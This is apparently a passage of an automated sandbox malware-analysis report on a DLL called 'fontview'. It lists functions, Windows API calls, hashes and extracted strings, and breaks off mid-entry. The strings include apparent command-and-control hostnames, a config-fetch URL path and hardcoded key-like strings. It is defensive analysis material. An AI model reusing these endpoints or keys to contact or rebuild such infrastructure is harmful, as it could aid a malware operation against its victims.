Opcode Fuzzy Hash: e1fb886c5aeb8dbae39b044ecd0a81fa01c9e8e7afcd57a19af7fa8add68997b
Instruction Fuzzy Hash: D6D1B675D04249EFEB15DFA4CC91EEEB7B9EF05340F1040AAE509AB191DB31AE49CB60

Function 1001E1A7 Relevance: 24.1, APIs: 16, Instructions: 76
sleepthreadCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

closesocket.WS2_32(?), ref: 1001E1BD
closesocket.WS2_32(?), ref: 1001E1C8
closesocket.WS2_32(?), ref: 1001E1D4
Sleep.KERNELBASE(00000064,?,?,?,10007547,?,1000682B,?,?,?), ref: 1001E1EE
TerminateThread.KERNELBASE(?,00000000,?,10007547,?,1000682B,?,?,?), ref: 1001E1F5
CloseHandle.KERNEL32(?,?,10007547,?,1000682B,?,?,?), ref: 1001E1FA
Sleep.KERNEL32(00000064,?,?,?,10007547,?,1000682B,?,?,?), ref: 1001E20C
TerminateThread.KERNELBASE(?,00000000,?,10007547,?,1000682B,?,?,?), ref: 1001E213
CloseHandle.KERNEL32(?,?,10007547,?,1000682B,?,?,?), ref: 1001E218
Sleep.KERNEL32(00000064,?,?,?,10007547,?,1000682B,?,?,?), ref: 1001E22A
TerminateThread.KERNELBASE(?,00000000,?,10007547,?,1000682B,?,?,?), ref: 1001E231
CloseHandle.KERNEL32(?,?,10007547,?,1000682B,?,?,?), ref: 1001E236
Sleep.KERNEL32(00000064,?,?,?,10007547,?,1000682B,?,?,?), ref: 1001E248
TerminateThread.KERNELBASE(?,00000000,?,10007547,?,1000682B,?,?,?), ref: 1001E24F
CloseHandle.KERNEL32(?,?,10007547,?,1000682B,?,?,?), ref: 1001E254
Sleep.KERNELBASE ref: 1001E26F

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: Sleep$CloseHandleTerminateThread$closesocket
String ID:
API String ID: 3830272782-0
Opcode ID: 17bd002c58accd4946d52a30de27bc7000296f87d6f1dab3d335eb3c6ed9b892
Instruction ID: bc42b57c38fdf492546c018e19de88c484626926c77996ddfbf50983c1e4f3a2
Opcode Fuzzy Hash: 17bd002c58accd4946d52a30de27bc7000296f87d6f1dab3d335eb3c6ed9b892
Instruction Fuzzy Hash: 5121B830500B95AFD761AF36CC88B1ABBE5FF48749F11482DE186969A0D7B1E890CF14

Function 1000246E Relevance: 23.1, APIs: 3, Strings: 10, Instructions: 362
networkCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 10002473

Part of subcall function 1001A146: _malloc.LIBCMT ref: 1001A17E

Part of subcall function 1001A61C: _wprintf.LIBCMT ref: 1001A640

Part of subcall function 1001A65F: _wprintf.LIBCMT ref: 1001A683

Part of subcall function 10033AFD: __wcstoi64.LIBCMT ref: 10033B10

WSAGetLastError.WS2_32(?,?,?,00000000,000000FF,00000000,?,?,?,?,00000001), ref: 100028E2

Part of subcall function 10003256: _memmove.LIBCMT ref: 100032C6

Part of subcall function 10002F31: _memmove.LIBCMT ref: 10002F99

Part of subcall function 10003078: __EH_prolog.LIBCMT ref: 1000307D

Part of subcall function 10017A82: __EH_prolog.LIBCMT ref: 10017A87
Part of subcall function 10017A82: _wprintf.LIBCMT ref: 10017AB4

Part of subcall function 10017C93: _wprintf.LIBCMT ref: 10017CB7

Part of subcall function 10017CD2: _wprintf.LIBCMT ref: 10017CF2
Part of subcall function 10017CD2: _wprintf.LIBCMT ref: 10017D17

Part of subcall function 10017BF7: _wprintf.LIBCMT ref: 10017C1D

_swscanf.LIBCMT ref: 100027EB

Strings

%d bytes received %s , xrefs: 10002929
GET, xrefs: 10002575, 10002585
Accept, xrefs: 100026F7
http://, xrefs: 10002595, 100025A1
HTTP readBody data:%s, xrefs: 10002784
text/plain, xrefs: 100026E8
Content-type, xrefs: 100026C3
HTTP/1.1, xrefs: 10002609, 10002615
Host, xrefs: 10002683
application/x-www-form-urlencoded, xrefs: 100026B4

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: _wprintf$H_prolog$_memmove$ErrorLast__wcstoi64_malloc_swscanf
String ID: HTTP/1.1$ http://$%d bytes received %s $Accept$Content-type$GET$HTTP readBody data:%s$Host$application/x-www-form-urlencoded$text/plain
API String ID: 1397112314-3476068429
Opcode ID: 0d0e6fe9f1e92f682e15250806ca41007864c308aafd20128a6335f297059f73
Instruction ID: a7634ae425d1516add6669ffa0e6d985a436ae34248816d06a7b430fa3304256
Opcode Fuzzy Hash: 0d0e6fe9f1e92f682e15250806ca41007864c308aafd20128a6335f297059f73
Instruction Fuzzy Hash: B1E1D235800258EEEB15DBA4CC96FEDB7B8EF11350F50409AE50A77186DF706B88CB62

Function 1000E186 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 213
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 1000E18B
__time64.LIBCMT ref: 1000E1B1

Part of subcall function 10034410: GetSystemTimeAsFileTime.KERNEL32(?,00000007,00000007,?,10007696,00000000,1005ADE8,?), ref: 10034419
Part of subcall function 10034410: __aulldiv.LIBCMT ref: 10034439

_rand.LIBCMT ref: 1000E1BE
__time64.LIBCMT ref: 1000E1C7

Part of subcall function 10011419: __EH_prolog.LIBCMT ref: 1001141E

_sprintf.LIBCMT ref: 1000E228

Part of subcall function 1000246E: __EH_prolog.LIBCMT ref: 10002473

Sleep.KERNELBASE(niserr), ref: 1000E3FF

Strings

niserr, xrefs: 1000E3ED
Make Context:%s,time:%d,rand:%d, xrefs: 1000E427
/index.php/inface/Heart/getConfigDyn?m_id=%s&member_id=%d&time=%lld, xrefs: 1000E222
hjh~$754jhghj, xrefs: 1000E31E
api.5566331.com, xrefs: 1000E255

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: H_prolog$Time__time64$FileSleepSystem__aulldiv_rand_sprintf
String ID: /index.php/inface/Heart/getConfigDyn?m_id=%s&member_id=%d&time=%lld$Make Context:%s,time:%d,rand:%d$api.5566331.com$hjh~$754jhghj$niserr
API String ID: 105401972-798844403
Opcode ID: c8a749317634e0655c4f41a80e829878645b6c3bdfcc3fb24e38985346b8fab7
Instruction ID: 49858955eb463be79c684a571caf072d61cc3a4debedbcbecd596b130e18948f
Opcode Fuzzy Hash: c8a749317634e0655c4f41a80e829878645b6c3bdfcc3fb24e38985346b8fab7
Instruction Fuzzy Hash: E8815D78C00249AEDB14DBA4CC91BEDB7B8EF14340F50849AE45A77156EF346B89CFA1

Function 1000E4E1 Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 203
threadsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 1000E7F8: ReleaseMutex.KERNEL32(00000000,00000001,10168660,100074E8), ref: 1000E816
Part of subcall function 1000E7F8: CloseHandle.KERNEL32(00000000), ref: 1000E822
Part of subcall function 1000E7F8: Sleep.KERNELBASE(0000044C,?,00000001,10168660,100074E8), ref: 1000E831
Part of subcall function 1000E7F8: TerminateThread.KERNEL32(00000000,00000000,?,00000001,10168660,100074E8), ref: 1000E84A
Part of subcall function 1000E7F8: CloseHandle.KERNEL32(00000000,?,00000001,10168660,100074E8), ref: 1000E852
Part of subcall function 1000E7F8: TerminateThread.KERNELBASE(00000000,00000000,?,00000001,10168660,100074E8), ref: 1000E868
Part of subcall function 1000E7F8: CloseHandle.KERNEL32(00000000,?,00000001,10168660,100074E8), ref: 1000E870
Part of subcall function 1000E7F8: TerminateThread.KERNELBASE(00000000,00000000,?,00000001,10168660,100074E8), ref: 1000E886
Part of subcall function 1000E7F8: CloseHandle.KERNEL32(00000000,?,00000001,10168660,100074E8), ref: 1000E88E

Part of subcall function 1000DA3F: _malloc.LIBCMT ref: 1000DAD5
Part of subcall function 1000DA3F: _malloc.LIBCMT ref: 1000DAEF
Part of subcall function 1000DA3F: _malloc.LIBCMT ref: 1000DB04
Part of subcall function 1000DA3F: _malloc.LIBCMT ref: 1000DB1D

Sleep.KERNEL32(000003E8,?,?,?,1005ADE8,?,?,?,00000000), ref: 1000E62E

Part of subcall function 1000DB5E: __EH_prolog.LIBCMT ref: 1000DB63
Part of subcall function 1000DB5E: gethostbyname.WS2_32(wktcp.61611.live), ref: 1000DB78

Sleep.KERNEL32(000003E8), ref: 1000E68C

Part of subcall function 1000DB5E: inet_addr.WS2_32(127.0.0.1), ref: 1000DBA7
Part of subcall function 1000DB5E: inet_addr.WS2_32(127.0.0.0), ref: 1000DBB2
Part of subcall function 1000DB5E: inet_addr.WS2_32(0.0.0.0), ref: 1000DBBD
Part of subcall function 1000DB5E: inet_addr.WS2_32(114.114.114.114), ref: 1000DC08
Part of subcall function 1000DB5E: inet_addr.WS2_32(?), ref: 1000DC75

CreateThread.KERNEL32(00000000,00000000,1000D124,?,00000000,00000000), ref: 1000E725
CreateThread.KERNELBASE(00000000,00000000,1000D556,?,00000000,00000000), ref: 1000E767
CreateThread.KERNELBASE(00000000,00000000,Function_0000D52D,?,00000000,00000000), ref: 1000E785

Strings

Http GetSystem config is faild, xrefs: 1000E5B8, 1000E5BD, 1000E5CD
[HOST]Today is has been running , xrefs: 1000E57A, 1000E586
l, xrefs: 1000E5BE
[HOST] , xrefs: 1000E5A1, 1000E5A6, 1000E5AE
config is faild, xrefs: 1000E5D7
i, xrefs: 1000E594

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: Thread$inet_addr$CloseHandle_malloc$CreateSleepTerminate$H_prologMutexReleasegethostbyname
String ID: Http GetSystem config is faild$[HOST] $[HOST]Today is has been running $config is faild$i$l
API String ID: 1403256369-2250681267
Opcode ID: 74273a4823bbfb05fca83037bc54ed03a1f4fb284fa863f7a13985c7d6914954
Instruction ID: 7789fda3e1e64cde54be39b73e63a15e1d5b9d6e7ac2d44710eacef3f7df3415
Opcode Fuzzy Hash: 74273a4823bbfb05fca83037bc54ed03a1f4fb284fa863f7a13985c7d6914954
Instruction Fuzzy Hash: 9F71D7B5508781AFE310DF24CC84AAFBBE9EF88394F00091DF49A57295DB74AD44CB62

Function 1001D145 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 175
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

recvfrom.WS2_32(?,?,00000400,00000000,?,?), ref: 1001D1C7
WSAGetLastError.WS2_32 ref: 1001D1D4
closesocket.WS2_32(000000FF), ref: 1001D367

Strings

cc1, xrefs: 1001D1E5
bck, xrefs: 1001D210, 1001D21C

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: ErrorLastclosesocketrecvfrom
String ID: bck$cc1
API String ID: 3381545151-2601045076
Opcode ID: 129aae17363f5c89898e632d42c80201e10783f1f3fa59a68ecd7131db66c8c6
Instruction ID: 74b77c914f8fb08b1b481ee05821763d154c8954b077fc1ebe75881fb8d60909
Opcode Fuzzy Hash: 129aae17363f5c89898e632d42c80201e10783f1f3fa59a68ecd7131db66c8c6
Instruction Fuzzy Hash: 5C51D372508341AFE710EF60CC81BABB7E8EF45354F404A1EFAA587191D771EA48CB52

Function 1000D5A3 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 169synchronizationCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 1000D5A8

Part of subcall function 10033888: _malloc.LIBCMT ref: 100338A0

Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 1000D691

Part of subcall function 1003245C: std::exception::exception.LIBCMT ref: 10032472
Part of subcall function 1003245C: __CxxThrowException@8.LIBCMT ref: 10032487

_sprintf.LIBCMT ref: 1000D764
CreateMutexA.KERNELBASE(00000000,00000000,?,00000000,00000000,00000000,00000000,000000FF,?,?,?,?,10065258,00000000,0000000F,00000000), ref: 1000D7CC
__time64.LIBCMT ref: 1000D809

Strings

ami.sh74lmy.com, xrefs: 1000D753
jkdi%42&!#123, xrefs: 1000D776
%s%s, xrefs: 1000D75E

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_Concurrent_queue_base_v4::_CreateException@8H_prologInternal_throw_exceptionMutexThrow__time64_malloc_sprintfstd::exception::exception
String ID: %s%s$ami.sh74lmy.com$jkdi%42&!#123
API String ID: 3941556643-366288768
Opcode ID: 4e621263689d016038f60075a19200faf700512eb17d5e2d414ce0ae6ad1d294
Instruction ID: 694c5179693b881f44d76fd1f052d4137bf0354451c1df981b2dbb7ff4a16f9c
Opcode Fuzzy Hash: 4e621263689d016038f60075a19200faf700512eb17d5e2d414ce0ae6ad1d294
Instruction Fuzzy Hash: 1381F1B4801B459ED721CFBAC4917DAFBE4FF19300F90896ED1AE97242DB706644CB61

Function 1000E7F8 Relevance: 13.6, APIs: 9, Instructions: 57threadsleepsynchronizationCOMMONLIBRARYCODE

Download Yara Rule

APIs

ReleaseMutex.KERNEL32(00000000,00000001,10168660,100074E8), ref: 1000E816
CloseHandle.KERNEL32(00000000), ref: 1000E822
Sleep.KERNELBASE(0000044C,?,00000001,10168660,100074E8), ref: 1000E831
TerminateThread.KERNEL32(00000000,00000000,?,00000001,10168660,100074E8), ref: 1000E84A
CloseHandle.KERNEL32(00000000,?,00000001,10168660,100074E8), ref: 1000E852
TerminateThread.KERNELBASE(00000000,00000000,?,00000001,10168660,100074E8), ref: 1000E868
CloseHandle.KERNEL32(00000000,?,00000001,10168660,100074E8), ref: 1000E870
TerminateThread.KERNELBASE(00000000,00000000,?,00000001,10168660,100074E8), ref: 1000E886
CloseHandle.KERNEL32(00000000,?,00000001,10168660,100074E8), ref: 1000E88E

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: CloseHandle$TerminateThread$MutexReleaseSleep
String ID:
API String ID: 1937260624-0
Opcode ID: 46664f924153e172b5295a1f84d1b4d0382347f0e01acedb0fa99ae70939fa27
Instruction ID: 37b1b03ea3f2de3eb637aef0c1f15a50e86a627c4c476671b1db0ab1197ea950
Opcode Fuzzy Hash: 46664f924153e172b5295a1f84d1b4d0382347f0e01acedb0fa99ae70939fa27
Instruction Fuzzy Hash: 3B11D631600B44ABF760DB35CC84BEBB7E8EF48795F114829E1AEA61A0DB74AC448B54

Function 10017CD2 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

_wprintf.LIBCMT ref: 10017CF2
_wprintf.LIBCMT ref: 10017D17

Strings

inc\http\HttpConnection.cpp, xrefs: 10017CDB, 10017CE2, 10017D07
sendHeaders(), xrefs: 10017D0D
request: %s%s, xrefs: 10017D3C
Error (%s) in line: %d in file: %s, xrefs: 10017CED, 10017D12
_requestBuffer.length() > 0, xrefs: 10017CE8

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: _wprintf
String ID: request: %s%s$Error (%s) in line: %d in file: %s$_requestBuffer.length() > 0$inc\http\HttpConnection.cpp$sendHeaders()
API String ID: 2738768116-1894206355
Opcode ID: aac0029b60e65bad708861f4eb6a3c3131cf6d18cbd002a15836ac9e94790d54
Instruction ID: 0e289029b42b07f0cd472e7fd920a7862120a76635c283eded3de750890f031e
Opcode Fuzzy Hash: aac0029b60e65bad708861f4eb6a3c3131cf6d18cbd002a15836ac9e94790d54
Instruction Fuzzy Hash: BC01F530201254AAF330EA24AC1AEA736B5FF92601F44081FF5464F183D771EA8A8372

Function 1001A313 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33networkCOMMONLIBRARYCODE

Download Yara Rule

APIs

_wprintf.LIBCMT ref: 1001A334
send.WS2_32(?,00000000,?,00000000), ref: 1001A34E
WSAGetLastError.WS2_32(?,?,10017BAA,?,1005AEE0,00000000,Content-Length), ref: 1001A35B

Strings

inc\http\Socket.cpp, xrefs: 1001A323
data.length() > 0, xrefs: 1001A32A
Error (%s) in line: %d in file: %s, xrefs: 1001A32F

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: ErrorLast_wprintfsend
String ID: Error (%s) in line: %d in file: %s$data.length() > 0$inc\http\Socket.cpp
API String ID: 2875704336-3018366312
Opcode ID: 4ec6c211ff026b7764385a175423c0615eb00ac7a6313221d5c3647955ba46a1
Instruction ID: a370ff211135ef3551e3cbd0d85bcf54042522b8ec64c26ef99c261646a77a4d
Opcode Fuzzy Hash: 4ec6c211ff026b7764385a175423c0615eb00ac7a6313221d5c3647955ba46a1
Instruction Fuzzy Hash: 0EF0B432500620BBE720AA64DC04B86F7A4FB01671F004627FA249B691C370BE8587E1

Function 1001A0F8 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 29networkCOMMON

Download Yara Rule

APIs

_wprintf.LIBCMT ref: 1001A110
inet_addr.WS2_32 ref: 1001A119
gethostbyname.WS2_32 ref: 1001A131

Strings

inc\http\Socket.cpp, xrefs: 1001A0FF
address != NULL, xrefs: 1001A106
Error (%s) in line: %d in file: %s, xrefs: 1001A10B

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: _wprintfgethostbynameinet_addr
String ID: Error (%s) in line: %d in file: %s$address != NULL$inc\http\Socket.cpp
API String ID: 2322658221-3467638553
Opcode ID: 78475d0063012b7c6acc5eaa6a2975fe2cf6f67b4af13489960fe63b029e21f7
Instruction ID: 4b9a3f45cc822d481f5f270d039c0712fd041b9735d2b0daff9342695111d3cf
Opcode Fuzzy Hash: 78475d0063012b7c6acc5eaa6a2975fe2cf6f67b4af13489960fe63b029e21f7
Instruction Fuzzy Hash: 08E092316109307BDB11EB2CAC44AC933D4EB06232F418143F404DB1A2D774EDC24AD5

Function 100117AA Relevance: 9.1, APIs: 6, Instructions: 84synchronizationsleepCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 100117AF
Sleep.KERNELBASE(00002710,?,?,00000000,000000FF,1005AF8C,00000000,10006588,?,00000000), ref: 10011861
ReleaseMutex.KERNEL32 ref: 10011873
CloseHandle.KERNELBASE ref: 10011881
ReleaseMutex.KERNEL32 ref: 10011890
CloseHandle.KERNEL32 ref: 10011898

Part of subcall function 10001E92: _memmove.LIBCMT ref: 10001EF7

Part of subcall function 100154F5: __EH_prolog.LIBCMT ref: 100154FA
Part of subcall function 100154F5: _sprintf.LIBCMT ref: 10015565
Part of subcall function 100154F5: OpenMutexA.KERNEL32(00100000,00000000,?), ref: 100155D4
Part of subcall function 100154F5: GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 100155DE
Part of subcall function 100154F5: OpenMutexA.KERNEL32(00100000,00000000,?), ref: 10015605
Part of subcall function 100154F5: GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 10015609
Part of subcall function 100154F5: CreateMutexA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?), ref: 10015634

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: Mutex$CloseErrorH_prologHandleLastOpenRelease$CreateSleep_memmove_sprintf
String ID:
API String ID: 4039639769-0
Opcode ID: 16fd9f3295214c5a4623525ff434245626e2363462dd747976b7434c5c43acdf
Instruction ID: 3068f5a1bf16b1bd64fdc3553b6d17508d20df758c6a95adc449cb463f1d6c97
Opcode Fuzzy Hash: 16fd9f3295214c5a4623525ff434245626e2363462dd747976b7434c5c43acdf
Instruction Fuzzy Hash: 8F31C075900124AFEB14DF64CC96BED77B5EF44360F10826AF806AB1A2DF74AE85CB50

Function 1001A91C Relevance: 9.0, APIs: 6, Instructions: 35sleepsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 10005BE6: WSAStartup.WS2_32(00000202,?), ref: 10005C19

Sleep.KERNELBASE(0000000A), ref: 1001A92E
ReleaseMutex.KERNEL32(00000000), ref: 1001A94E
CloseHandle.KERNEL32 ref: 1001A960
ReleaseMutex.KERNEL32 ref: 1001A968
CloseHandle.KERNEL32 ref: 1001A974
Sleep.KERNELBASE(000001F4), ref: 1001A989

Memory Dump Source

